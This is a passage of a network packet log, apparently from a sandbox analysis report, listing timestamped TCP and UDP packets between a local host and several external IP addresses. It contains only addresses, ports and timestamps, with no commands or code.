                                                                                                            Sep 27, 2024 16:00:41.122996092 CEST804916566.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:41.123100996 CEST4916580192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:41.123112917 CEST804916566.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:41.123178959 CEST804916566.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:41.123191118 CEST804916566.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:41.123218060 CEST4916580192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:41.139822960 CEST804916566.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:41.139836073 CEST804916566.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:41.139847994 CEST804916566.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:41.139914989 CEST804916566.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:41.139925003 CEST804916566.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:41.139936924 CEST804916566.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:41.139935970 CEST4916580192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:41.140032053 CEST4916580192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:41.140080929 CEST804916566.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:41.170464993 CEST4916580192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:44.922249079 CEST4916580192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:44.927239895 CEST804916566.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:45.158360958 CEST804916566.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:45.158379078 CEST804916566.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:45.158399105 CEST804916566.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:45.158411026 CEST804916566.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:45.158425093 CEST804916566.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:45.158437014 CEST4916580192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:45.158490896 CEST4916580192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:45.158525944 CEST804916566.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:45.158601046 CEST4916580192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:45.158677101 CEST804916566.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:45.158745050 CEST804916566.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:45.158792019 CEST4916580192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:45.158854008 CEST804916566.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:45.158865929 CEST804916566.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:45.158876896 CEST804916566.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:45.158905983 CEST4916580192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:45.159051895 CEST804916566.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:45.159092903 CEST4916580192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:45.159488916 CEST804916566.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:45.159537077 CEST804916566.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:45.159584999 CEST4916580192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:45.296570063 CEST804916566.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:45.296647072 CEST804916566.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:45.296658993 CEST804916566.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:45.296705008 CEST4916580192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:45.296710968 CEST804916566.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:45.296725035 CEST804916566.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:45.296747923 CEST4916580192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:45.296811104 CEST804916566.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:45.296854973 CEST4916580192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:45.296924114 CEST804916566.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:45.296937943 CEST804916566.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:45.296972990 CEST4916580192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:45.297069073 CEST804916566.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:45.297080994 CEST804916566.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:45.297116995 CEST4916580192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:45.297611952 CEST804916566.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:45.297651052 CEST804916566.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:00:45.297694921 CEST4916580192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:00:45.586046934 CEST4916780192.168.2.22158.101.44.242
                                                                                                            Sep 27, 2024 16:00:45.590995073 CEST8049167158.101.44.242192.168.2.22
                                                                                                            Sep 27, 2024 16:00:45.591068029 CEST4916780192.168.2.22158.101.44.242
                                                                                                            Sep 27, 2024 16:00:45.591738939 CEST4916780192.168.2.22158.101.44.242
                                                                                                            Sep 27, 2024 16:00:45.596535921 CEST8049167158.101.44.242192.168.2.22
                                                                                                            Sep 27, 2024 16:00:48.083055973 CEST8049167158.101.44.242192.168.2.22
                                                                                                            Sep 27, 2024 16:00:48.291662931 CEST8049167158.101.44.242192.168.2.22
                                                                                                            Sep 27, 2024 16:00:48.291727066 CEST4916780192.168.2.22158.101.44.242
                                                                                                            Sep 27, 2024 16:00:48.805161953 CEST4916780192.168.2.22158.101.44.242
                                                                                                            Sep 27, 2024 16:00:48.810137033 CEST8049167158.101.44.242192.168.2.22
                                                                                                            Sep 27, 2024 16:00:49.183049917 CEST8049167158.101.44.242192.168.2.22
                                                                                                            Sep 27, 2024 16:00:49.391602993 CEST8049167158.101.44.242192.168.2.22
                                                                                                            Sep 27, 2024 16:00:49.391688108 CEST4916780192.168.2.22158.101.44.242
                                                                                                            Sep 27, 2024 16:00:49.750796080 CEST49168443192.168.2.22188.114.96.3
                                                                                                            Sep 27, 2024 16:00:49.750859022 CEST44349168188.114.96.3192.168.2.22
                                                                                                            Sep 27, 2024 16:00:49.750926018 CEST49168443192.168.2.22188.114.96.3
                                                                                                            Sep 27, 2024 16:00:49.755563974 CEST49168443192.168.2.22188.114.96.3
                                                                                                            Sep 27, 2024 16:00:49.755583048 CEST44349168188.114.96.3192.168.2.22
                                                                                                            Sep 27, 2024 16:00:50.331274033 CEST44349168188.114.96.3192.168.2.22
                                                                                                            Sep 27, 2024 16:00:50.331345081 CEST49168443192.168.2.22188.114.96.3
                                                                                                            Sep 27, 2024 16:00:50.337779045 CEST49168443192.168.2.22188.114.96.3
                                                                                                            Sep 27, 2024 16:00:50.337793112 CEST44349168188.114.96.3192.168.2.22
                                                                                                            Sep 27, 2024 16:00:50.338129044 CEST44349168188.114.96.3192.168.2.22
                                                                                                            Sep 27, 2024 16:00:50.446702003 CEST49168443192.168.2.22188.114.96.3
                                                                                                            Sep 27, 2024 16:00:50.491395950 CEST44349168188.114.96.3192.168.2.22
                                                                                                            Sep 27, 2024 16:00:50.557063103 CEST44349168188.114.96.3192.168.2.22
                                                                                                            Sep 27, 2024 16:00:50.557161093 CEST44349168188.114.96.3192.168.2.22
                                                                                                            Sep 27, 2024 16:00:50.557220936 CEST49168443192.168.2.22188.114.96.3
                                                                                                            Sep 27, 2024 16:00:50.746764898 CEST49168443192.168.2.22188.114.96.3
                                                                                                            Sep 27, 2024 16:00:51.507982969 CEST4916780192.168.2.22158.101.44.242
                                                                                                            Sep 27, 2024 16:00:51.513044119 CEST8049167158.101.44.242192.168.2.22
                                                                                                            Sep 27, 2024 16:00:54.970485926 CEST8049167158.101.44.242192.168.2.22
                                                                                                            Sep 27, 2024 16:00:54.974176884 CEST49169443192.168.2.22188.114.96.3
                                                                                                            Sep 27, 2024 16:00:54.974240065 CEST44349169188.114.96.3192.168.2.22
                                                                                                            Sep 27, 2024 16:00:54.974605083 CEST49169443192.168.2.22188.114.96.3
                                                                                                            Sep 27, 2024 16:00:54.975171089 CEST49169443192.168.2.22188.114.96.3
                                                                                                            Sep 27, 2024 16:00:54.975193977 CEST44349169188.114.96.3192.168.2.22
                                                                                                            Sep 27, 2024 16:00:55.179586887 CEST8049167158.101.44.242192.168.2.22
                                                                                                            Sep 27, 2024 16:00:55.179687023 CEST4916780192.168.2.22158.101.44.242
                                                                                                            Sep 27, 2024 16:00:55.432821035 CEST44349169188.114.96.3192.168.2.22
                                                                                                            Sep 27, 2024 16:00:55.440090895 CEST49169443192.168.2.22188.114.96.3
                                                                                                            Sep 27, 2024 16:00:55.440110922 CEST44349169188.114.96.3192.168.2.22
                                                                                                            Sep 27, 2024 16:00:55.580544949 CEST44349169188.114.96.3192.168.2.22
                                                                                                            Sep 27, 2024 16:00:55.580652952 CEST44349169188.114.96.3192.168.2.22
                                                                                                            Sep 27, 2024 16:00:55.580945015 CEST49169443192.168.2.22188.114.96.3
                                                                                                            Sep 27, 2024 16:00:55.581337929 CEST49169443192.168.2.22188.114.96.3
                                                                                                            Sep 27, 2024 16:00:55.599126101 CEST4916780192.168.2.22158.101.44.242
                                                                                                            Sep 27, 2024 16:00:55.604526043 CEST8049167158.101.44.242192.168.2.22
                                                                                                            Sep 27, 2024 16:00:55.604617119 CEST4916780192.168.2.22158.101.44.242
                                                                                                            Sep 27, 2024 16:00:55.841800928 CEST4917080192.168.2.22193.122.130.0
                                                                                                            Sep 27, 2024 16:00:55.846602917 CEST8049170193.122.130.0192.168.2.22
                                                                                                            Sep 27, 2024 16:00:55.846754074 CEST4917080192.168.2.22193.122.130.0
                                                                                                            Sep 27, 2024 16:00:55.846873045 CEST4917080192.168.2.22193.122.130.0
                                                                                                            Sep 27, 2024 16:00:55.851727962 CEST8049170193.122.130.0192.168.2.22
                                                                                                            Sep 27, 2024 16:00:56.305012941 CEST8049170193.122.130.0192.168.2.22
                                                                                                            Sep 27, 2024 16:00:56.515530109 CEST8049170193.122.130.0192.168.2.22
                                                                                                            Sep 27, 2024 16:00:56.516191006 CEST4917080192.168.2.22193.122.130.0
                                                                                                            Sep 27, 2024 16:00:56.516230106 CEST4917080192.168.2.22193.122.130.0
                                                                                                            Sep 27, 2024 16:00:56.840346098 CEST49171443192.168.2.22188.114.96.3
                                                                                                            Sep 27, 2024 16:00:56.840394974 CEST44349171188.114.96.3192.168.2.22
                                                                                                            Sep 27, 2024 16:00:56.840440989 CEST49171443192.168.2.22188.114.96.3
                                                                                                            Sep 27, 2024 16:00:56.840884924 CEST49171443192.168.2.22188.114.96.3
                                                                                                            Sep 27, 2024 16:00:56.840899944 CEST44349171188.114.96.3192.168.2.22
                                                                                                            Sep 27, 2024 16:00:57.297082901 CEST44349171188.114.96.3192.168.2.22
                                                                                                            Sep 27, 2024 16:00:57.308038950 CEST49171443192.168.2.22188.114.96.3
                                                                                                            Sep 27, 2024 16:00:57.308078051 CEST44349171188.114.96.3192.168.2.22
                                                                                                            Sep 27, 2024 16:00:57.450289965 CEST44349171188.114.96.3192.168.2.22
                                                                                                            Sep 27, 2024 16:00:57.450383902 CEST44349171188.114.96.3192.168.2.22
                                                                                                            Sep 27, 2024 16:00:57.450489044 CEST49171443192.168.2.22188.114.96.3
                                                                                                            Sep 27, 2024 16:00:57.451220989 CEST49171443192.168.2.22188.114.96.3
                                                                                                            Sep 27, 2024 16:00:57.539115906 CEST4917280192.168.2.22193.122.6.168
                                                                                                            Sep 27, 2024 16:00:57.543986082 CEST8049172193.122.6.168192.168.2.22
                                                                                                            Sep 27, 2024 16:00:57.544045925 CEST4917280192.168.2.22193.122.6.168
                                                                                                            Sep 27, 2024 16:00:57.544178963 CEST4917280192.168.2.22193.122.6.168
                                                                                                            Sep 27, 2024 16:00:57.548979044 CEST8049172193.122.6.168192.168.2.22
                                                                                                            Sep 27, 2024 16:00:58.171607971 CEST8049172193.122.6.168192.168.2.22
                                                                                                            Sep 27, 2024 16:00:58.196424007 CEST49173443192.168.2.22188.114.97.3
                                                                                                            Sep 27, 2024 16:00:58.196475029 CEST44349173188.114.97.3192.168.2.22
                                                                                                            Sep 27, 2024 16:00:58.196537971 CEST49173443192.168.2.22188.114.97.3
                                                                                                            Sep 27, 2024 16:00:58.197197914 CEST49173443192.168.2.22188.114.97.3
                                                                                                            Sep 27, 2024 16:00:58.197217941 CEST44349173188.114.97.3192.168.2.22
                                                                                                            Sep 27, 2024 16:00:58.369369984 CEST4917280192.168.2.22193.122.6.168
                                                                                                            Sep 27, 2024 16:00:58.672820091 CEST44349173188.114.97.3192.168.2.22
                                                                                                            Sep 27, 2024 16:00:58.676940918 CEST49173443192.168.2.22188.114.97.3
                                                                                                            Sep 27, 2024 16:00:58.676970959 CEST44349173188.114.97.3192.168.2.22
                                                                                                            Sep 27, 2024 16:00:58.814595938 CEST44349173188.114.97.3192.168.2.22
                                                                                                            Sep 27, 2024 16:00:58.814733982 CEST44349173188.114.97.3192.168.2.22
                                                                                                            Sep 27, 2024 16:00:58.815315962 CEST49173443192.168.2.22188.114.97.3
                                                                                                            Sep 27, 2024 16:00:58.816915989 CEST49173443192.168.2.22188.114.97.3
                                                                                                            Sep 27, 2024 16:00:58.834884882 CEST4917280192.168.2.22193.122.6.168
                                                                                                            Sep 27, 2024 16:00:58.840497017 CEST8049172193.122.6.168192.168.2.22
                                                                                                            Sep 27, 2024 16:00:58.841046095 CEST4917280192.168.2.22193.122.6.168
                                                                                                            Sep 27, 2024 16:00:58.872013092 CEST4917480192.168.2.22193.122.130.0
                                                                                                            Sep 27, 2024 16:00:58.876882076 CEST8049174193.122.130.0192.168.2.22
                                                                                                            Sep 27, 2024 16:00:58.884942055 CEST4917480192.168.2.22193.122.130.0
                                                                                                            Sep 27, 2024 16:00:58.904943943 CEST4917480192.168.2.22193.122.130.0
                                                                                                            Sep 27, 2024 16:00:58.909820080 CEST8049174193.122.130.0192.168.2.22
                                                                                                            Sep 27, 2024 16:00:59.359123945 CEST8049174193.122.130.0192.168.2.22
                                                                                                            Sep 27, 2024 16:00:59.381133080 CEST49175443192.168.2.22188.114.97.3
                                                                                                            Sep 27, 2024 16:00:59.381181955 CEST44349175188.114.97.3192.168.2.22
                                                                                                            Sep 27, 2024 16:00:59.385371923 CEST49175443192.168.2.22188.114.97.3
                                                                                                            Sep 27, 2024 16:00:59.385371923 CEST49175443192.168.2.22188.114.97.3
                                                                                                            Sep 27, 2024 16:00:59.385421991 CEST44349175188.114.97.3192.168.2.22
                                                                                                            Sep 27, 2024 16:00:59.573829889 CEST4917480192.168.2.22193.122.130.0
                                                                                                            Sep 27, 2024 16:00:59.575676918 CEST8049174193.122.130.0192.168.2.22
                                                                                                            Sep 27, 2024 16:00:59.575762987 CEST4917480192.168.2.22193.122.130.0
                                                                                                            Sep 27, 2024 16:00:59.840512037 CEST44349175188.114.97.3192.168.2.22
                                                                                                            Sep 27, 2024 16:00:59.846940041 CEST49175443192.168.2.22188.114.97.3
                                                                                                            Sep 27, 2024 16:00:59.846956968 CEST44349175188.114.97.3192.168.2.22
                                                                                                            Sep 27, 2024 16:00:59.988661051 CEST44349175188.114.97.3192.168.2.22
                                                                                                            Sep 27, 2024 16:00:59.988794088 CEST44349175188.114.97.3192.168.2.22
                                                                                                            Sep 27, 2024 16:00:59.988879919 CEST49175443192.168.2.22188.114.97.3
                                                                                                            Sep 27, 2024 16:00:59.989475012 CEST49175443192.168.2.22188.114.97.3
                                                                                                            Sep 27, 2024 16:01:00.331448078 CEST4917480192.168.2.22193.122.130.0
                                                                                                            Sep 27, 2024 16:01:00.336545944 CEST8049174193.122.130.0192.168.2.22
                                                                                                            Sep 27, 2024 16:01:00.336601019 CEST4917480192.168.2.22193.122.130.0
                                                                                                            Sep 27, 2024 16:01:00.370275021 CEST4917680192.168.2.22132.226.247.73
                                                                                                            Sep 27, 2024 16:01:00.375125885 CEST8049176132.226.247.73192.168.2.22
                                                                                                            Sep 27, 2024 16:01:00.375181913 CEST4917680192.168.2.22132.226.247.73
                                                                                                            Sep 27, 2024 16:01:00.375473022 CEST4917680192.168.2.22132.226.247.73
                                                                                                            Sep 27, 2024 16:01:00.380242109 CEST8049176132.226.247.73192.168.2.22
                                                                                                            Sep 27, 2024 16:01:01.041918039 CEST8049176132.226.247.73192.168.2.22
                                                                                                            Sep 27, 2024 16:01:01.064448118 CEST49177443192.168.2.22188.114.96.3
                                                                                                            Sep 27, 2024 16:01:01.064483881 CEST44349177188.114.96.3192.168.2.22
                                                                                                            Sep 27, 2024 16:01:01.064538956 CEST49177443192.168.2.22188.114.96.3
                                                                                                            Sep 27, 2024 16:01:01.065094948 CEST49177443192.168.2.22188.114.96.3
                                                                                                            Sep 27, 2024 16:01:01.065109015 CEST44349177188.114.96.3192.168.2.22
                                                                                                            Sep 27, 2024 16:01:01.256927013 CEST8049176132.226.247.73192.168.2.22
                                                                                                            Sep 27, 2024 16:01:01.257070065 CEST4917680192.168.2.22132.226.247.73
                                                                                                            Sep 27, 2024 16:01:01.584363937 CEST44349177188.114.96.3192.168.2.22
                                                                                                            Sep 27, 2024 16:01:01.587949038 CEST49177443192.168.2.22188.114.96.3
                                                                                                            Sep 27, 2024 16:01:01.587961912 CEST44349177188.114.96.3192.168.2.22
                                                                                                            Sep 27, 2024 16:01:01.757208109 CEST44349177188.114.96.3192.168.2.22
                                                                                                            Sep 27, 2024 16:01:01.757308960 CEST44349177188.114.96.3192.168.2.22
                                                                                                            Sep 27, 2024 16:01:01.757406950 CEST49177443192.168.2.22188.114.96.3
                                                                                                            Sep 27, 2024 16:01:01.757987976 CEST49177443192.168.2.22188.114.96.3
                                                                                                            Sep 27, 2024 16:01:01.770941019 CEST4917680192.168.2.22132.226.247.73
                                                                                                            Sep 27, 2024 16:01:01.776909113 CEST8049176132.226.247.73192.168.2.22
                                                                                                            Sep 27, 2024 16:01:01.778513908 CEST4917680192.168.2.22132.226.247.73
                                                                                                            Sep 27, 2024 16:01:01.796571970 CEST4917880192.168.2.22193.122.130.0
                                                                                                            Sep 27, 2024 16:01:01.801712036 CEST8049178193.122.130.0192.168.2.22
                                                                                                            Sep 27, 2024 16:01:01.801770926 CEST4917880192.168.2.22193.122.130.0
                                                                                                            Sep 27, 2024 16:01:01.801892996 CEST4917880192.168.2.22193.122.130.0
                                                                                                            Sep 27, 2024 16:01:01.806703091 CEST8049178193.122.130.0192.168.2.22
                                                                                                            Sep 27, 2024 16:01:03.284373045 CEST8049178193.122.130.0192.168.2.22
                                                                                                            Sep 27, 2024 16:01:03.305545092 CEST49179443192.168.2.22188.114.97.3
                                                                                                            Sep 27, 2024 16:01:03.305578947 CEST44349179188.114.97.3192.168.2.22
                                                                                                            Sep 27, 2024 16:01:03.305649042 CEST49179443192.168.2.22188.114.97.3
                                                                                                            Sep 27, 2024 16:01:03.306071997 CEST49179443192.168.2.22188.114.97.3
                                                                                                            Sep 27, 2024 16:01:03.306091070 CEST44349179188.114.97.3192.168.2.22
                                                                                                            Sep 27, 2024 16:01:03.489396095 CEST4917880192.168.2.22193.122.130.0
                                                                                                            Sep 27, 2024 16:01:03.790854931 CEST44349179188.114.97.3192.168.2.22
                                                                                                            Sep 27, 2024 16:01:03.794817924 CEST49179443192.168.2.22188.114.97.3
                                                                                                            Sep 27, 2024 16:01:03.794856071 CEST44349179188.114.97.3192.168.2.22
                                                                                                            Sep 27, 2024 16:01:03.949378967 CEST44349179188.114.97.3192.168.2.22
                                                                                                            Sep 27, 2024 16:01:03.949481964 CEST44349179188.114.97.3192.168.2.22
                                                                                                            Sep 27, 2024 16:01:03.949546099 CEST49179443192.168.2.22188.114.97.3
                                                                                                            Sep 27, 2024 16:01:03.950763941 CEST49179443192.168.2.22188.114.97.3
                                                                                                            Sep 27, 2024 16:01:04.105248928 CEST4917880192.168.2.22193.122.130.0
                                                                                                            Sep 27, 2024 16:01:04.110400915 CEST8049178193.122.130.0192.168.2.22
                                                                                                            Sep 27, 2024 16:01:04.110471010 CEST4917880192.168.2.22193.122.130.0
                                                                                                            Sep 27, 2024 16:01:04.170152903 CEST4918080192.168.2.22158.101.44.242
                                                                                                            Sep 27, 2024 16:01:04.175180912 CEST8049180158.101.44.242192.168.2.22
                                                                                                            Sep 27, 2024 16:01:04.175244093 CEST4918080192.168.2.22158.101.44.242
                                                                                                            Sep 27, 2024 16:01:04.175568104 CEST4918080192.168.2.22158.101.44.242
                                                                                                            Sep 27, 2024 16:01:04.180361032 CEST8049180158.101.44.242192.168.2.22
                                                                                                            Sep 27, 2024 16:01:05.343657017 CEST8049180158.101.44.242192.168.2.22
                                                                                                            Sep 27, 2024 16:01:05.361929893 CEST49181443192.168.2.22188.114.97.3
                                                                                                            Sep 27, 2024 16:01:05.361973047 CEST44349181188.114.97.3192.168.2.22
                                                                                                            Sep 27, 2024 16:01:05.362052917 CEST49181443192.168.2.22188.114.97.3
                                                                                                            Sep 27, 2024 16:01:05.362545967 CEST49181443192.168.2.22188.114.97.3
                                                                                                            Sep 27, 2024 16:01:05.362556934 CEST44349181188.114.97.3192.168.2.22
                                                                                                            Sep 27, 2024 16:01:05.549081087 CEST4918080192.168.2.22158.101.44.242
                                                                                                            Sep 27, 2024 16:01:05.551609039 CEST8049180158.101.44.242192.168.2.22
                                                                                                            Sep 27, 2024 16:01:05.551675081 CEST4918080192.168.2.22158.101.44.242
                                                                                                            Sep 27, 2024 16:01:05.819628000 CEST44349181188.114.97.3192.168.2.22
                                                                                                            Sep 27, 2024 16:01:05.823065996 CEST49181443192.168.2.22188.114.97.3
                                                                                                            Sep 27, 2024 16:01:05.823091030 CEST44349181188.114.97.3192.168.2.22
                                                                                                            Sep 27, 2024 16:01:05.957338095 CEST44349181188.114.97.3192.168.2.22
                                                                                                            Sep 27, 2024 16:01:05.957446098 CEST44349181188.114.97.3192.168.2.22
                                                                                                            Sep 27, 2024 16:01:05.957490921 CEST49181443192.168.2.22188.114.97.3
                                                                                                            Sep 27, 2024 16:01:05.958157063 CEST49181443192.168.2.22188.114.97.3
                                                                                                            Sep 27, 2024 16:01:05.974735975 CEST4918080192.168.2.22158.101.44.242
                                                                                                            Sep 27, 2024 16:01:05.980047941 CEST8049180158.101.44.242192.168.2.22
                                                                                                            Sep 27, 2024 16:01:05.980119944 CEST4918080192.168.2.22158.101.44.242
                                                                                                            Sep 27, 2024 16:01:05.997277975 CEST4918280192.168.2.22158.101.44.242
                                                                                                            Sep 27, 2024 16:01:06.002123117 CEST8049182158.101.44.242192.168.2.22
                                                                                                            Sep 27, 2024 16:01:06.002181053 CEST4918280192.168.2.22158.101.44.242
                                                                                                            Sep 27, 2024 16:01:06.002305984 CEST4918280192.168.2.22158.101.44.242
                                                                                                            Sep 27, 2024 16:01:06.007716894 CEST8049182158.101.44.242192.168.2.22
                                                                                                            Sep 27, 2024 16:01:07.594924927 CEST8049182158.101.44.242192.168.2.22
                                                                                                            Sep 27, 2024 16:01:07.612381935 CEST49183443192.168.2.22188.114.97.3
                                                                                                            Sep 27, 2024 16:01:07.612411976 CEST44349183188.114.97.3192.168.2.22
                                                                                                            Sep 27, 2024 16:01:07.612457991 CEST49183443192.168.2.22188.114.97.3
                                                                                                            Sep 27, 2024 16:01:07.612864971 CEST49183443192.168.2.22188.114.97.3
                                                                                                            Sep 27, 2024 16:01:07.612884045 CEST44349183188.114.97.3192.168.2.22
                                                                                                            Sep 27, 2024 16:01:07.807583094 CEST8049182158.101.44.242192.168.2.22
                                                                                                            Sep 27, 2024 16:01:07.807635069 CEST4918280192.168.2.22158.101.44.242
                                                                                                            Sep 27, 2024 16:01:08.097603083 CEST44349183188.114.97.3192.168.2.22
                                                                                                            Sep 27, 2024 16:01:08.100717068 CEST49183443192.168.2.22188.114.97.3
                                                                                                            Sep 27, 2024 16:01:08.100735903 CEST44349183188.114.97.3192.168.2.22
                                                                                                            Sep 27, 2024 16:01:08.250611067 CEST44349183188.114.97.3192.168.2.22
                                                                                                            Sep 27, 2024 16:01:08.250735998 CEST44349183188.114.97.3192.168.2.22
                                                                                                            Sep 27, 2024 16:01:08.250792980 CEST49183443192.168.2.22188.114.97.3
                                                                                                            Sep 27, 2024 16:01:08.251235008 CEST49183443192.168.2.22188.114.97.3
                                                                                                            Sep 27, 2024 16:01:08.262497902 CEST4918280192.168.2.22158.101.44.242
                                                                                                            Sep 27, 2024 16:01:08.267883062 CEST8049182158.101.44.242192.168.2.22
                                                                                                            Sep 27, 2024 16:01:08.267996073 CEST4918280192.168.2.22158.101.44.242
                                                                                                            Sep 27, 2024 16:01:08.275420904 CEST49184443192.168.2.22149.154.167.220
                                                                                                            Sep 27, 2024 16:01:08.275485992 CEST44349184149.154.167.220192.168.2.22
                                                                                                            Sep 27, 2024 16:01:08.275584936 CEST49184443192.168.2.22149.154.167.220
                                                                                                            Sep 27, 2024 16:01:08.276190042 CEST49184443192.168.2.22149.154.167.220
                                                                                                            Sep 27, 2024 16:01:08.276207924 CEST44349184149.154.167.220192.168.2.22
                                                                                                            Sep 27, 2024 16:01:08.913152933 CEST44349184149.154.167.220192.168.2.22
                                                                                                            Sep 27, 2024 16:01:08.913224936 CEST49184443192.168.2.22149.154.167.220
                                                                                                            Sep 27, 2024 16:01:08.918011904 CEST49184443192.168.2.22149.154.167.220
                                                                                                            Sep 27, 2024 16:01:08.918028116 CEST44349184149.154.167.220192.168.2.22
                                                                                                            Sep 27, 2024 16:01:08.918329000 CEST44349184149.154.167.220192.168.2.22
                                                                                                            Sep 27, 2024 16:01:08.921200037 CEST49184443192.168.2.22149.154.167.220
                                                                                                            Sep 27, 2024 16:01:08.967410088 CEST44349184149.154.167.220192.168.2.22
                                                                                                            Sep 27, 2024 16:01:09.199992895 CEST44349184149.154.167.220192.168.2.22
                                                                                                            Sep 27, 2024 16:01:09.200067043 CEST44349184149.154.167.220192.168.2.22
                                                                                                            Sep 27, 2024 16:01:09.200129986 CEST49184443192.168.2.22149.154.167.220
                                                                                                            Sep 27, 2024 16:01:09.204874039 CEST49184443192.168.2.22149.154.167.220
                                                                                                            Sep 27, 2024 16:01:32.881292105 CEST804916466.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:01:32.881382942 CEST4916480192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:01:32.881597996 CEST4916480192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:01:32.886321068 CEST804916466.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:01:41.751004934 CEST804916366.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:01:41.751063108 CEST4916380192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:01:50.158391953 CEST804916566.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:01:50.158562899 CEST4916580192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:01:50.158612013 CEST4916580192.168.2.2266.63.187.123
                                                                                                            Sep 27, 2024 16:01:50.163535118 CEST804916566.63.187.123192.168.2.22
                                                                                                            Sep 27, 2024 16:02:01.319425106 CEST8049170193.122.130.0192.168.2.22
                                                                                                            Sep 27, 2024 16:02:01.319489956 CEST4917080192.168.2.22193.122.130.0
                                                                                                            Sep 27, 2024 16:02:19.248609066 CEST4916380192.168.2.2266.63.187.123

                                                                                                            UDP Packets

                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Sep 27, 2024 16:00:45.470206976 CEST5456253192.168.2.228.8.8.8
                                                                                                            Sep 27, 2024 16:00:45.476576090 CEST53545628.8.8.8192.168.2.22
                                                                                                            Sep 27, 2024 16:00:45.559868097 CEST5291753192.168.2.228.8.8.8
                                                                                                            Sep 27, 2024 16:00:45.567013025 CEST53529178.8.8.8192.168.2.22
                                                                                                            Sep 27, 2024 16:00:49.489312887 CEST6275153192.168.2.228.8.8.8
                                                                                                            Sep 27, 2024 16:00:49.500715017 CEST53627518.8.8.8192.168.2.22
                                                                                                            Sep 27, 2024 16:00:55.606264114 CEST5789353192.168.2.228.8.8.8
                                                                                                            Sep 27, 2024 16:00:55.612976074 CEST53578938.8.8.8192.168.2.22
                                                                                                            Sep 27, 2024 16:00:55.615405083 CEST5482153192.168.2.228.8.8.8
                                                                                                            Sep 27, 2024 16:00:55.827063084 CEST53548218.8.8.8192.168.2.22
                                                                                                            Sep 27, 2024 16:00:55.827486992 CEST5482153192.168.2.228.8.8.8
                                                                                                            Sep 27, 2024 16:00:55.834384918 CEST53548218.8.8.8192.168.2.22
                                                                                                            Sep 27, 2024 16:00:55.834559917 CEST5482153192.168.2.228.8.8.8
                                                                                                            Sep 27, 2024 16:00:55.841358900 CEST53548218.8.8.8192.168.2.22
                                                                                                            Sep 27, 2024 16:00:56.817902088 CEST5471953192.168.2.228.8.8.8
                                                                                                            Sep 27, 2024 16:00:56.825115919 CEST53547198.8.8.8192.168.2.22
                                                                                                            Sep 27, 2024 16:00:57.522747993 CEST4988153192.168.2.228.8.8.8
                                                                                                            Sep 27, 2024 16:00:57.529438019 CEST53498818.8.8.8192.168.2.22
